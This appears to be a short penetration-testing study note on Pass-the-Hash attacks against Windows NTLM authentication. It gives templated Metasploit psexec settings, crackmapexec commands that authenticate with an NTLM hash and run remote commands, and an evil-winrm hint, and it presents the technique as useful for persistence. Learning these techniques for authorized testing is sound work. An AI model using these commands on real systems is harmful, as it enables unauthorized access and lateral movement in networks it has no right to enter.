---

Check This YT :LiYoutube: video: https://youtu.be/YgQsrifaHwo

an exploitation technique that involves capturing or harvesting NTLM hashes or clear text passwords and utilizing them to authenticate with the target legitimately.

• This works because NTLM authentication only requires the hash, not the original password.

---

We can use multiple tools to facilitate a Pass-The-Hash attack:

• Metasploit PsExec module [[SMB PsExec]] exploit/windows/smb/psexec

  • 🛑 if this module doesn't work try to change the target
  • Specify the LPORT, RHOSTS
  • Set SMBUSER <user>
  • Set SMBPass <Extracted_NTLM_Hash>
  
  

• Crackmapexec

  • Alternative tool for performing Pass-The-Hash.
  • crackmapexec smb <targer_ip> -u <username> -p <"Password">
  • 🛑 use -H instead of -p, because it is the hash option(And inside a quotations"").
  • To perform commands: crackmapexec smb <targer_ip> -u <username> -H <"NTLM_Hash"> -x "ipconfig"
  
  

• evilwinrm

You dont need to crack the hashes, just pass both the LM and NTLM hashes. "LM:NT"

This is considered a good practice for persistence